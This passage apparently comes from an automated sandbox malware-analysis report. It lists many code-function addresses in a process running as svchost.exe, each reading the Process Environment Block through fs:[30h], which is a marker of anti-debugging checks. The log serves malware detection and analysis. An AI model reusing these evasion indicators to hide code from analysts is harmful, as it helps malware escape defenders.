            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]2_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]2_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]2_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]2_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]2_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]2_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]2_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]2_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]2_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]2_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]2_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]2_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE47A0 mov eax, dword ptr fs:[00000030h]2_2_02FE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]2_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]2_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]2_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]2_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]2_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]2_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]2_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]2_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]2_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]2_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]2_2_02F644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]2_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA49A mov eax, dword ptr fs:[00000030h]2_2_02FEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]2_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA456 mov eax, dword ptr fs:[00000030h]2_2_02FEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]2_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]2_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]2_2_02F6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]2_2_02F2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]2_2_02F325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]2_2_02F365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]2_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]2_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]2_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004B00 mov eax, dword ptr fs:[00000030h]2_2_03004B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]2_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h]2_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]2_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]2_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
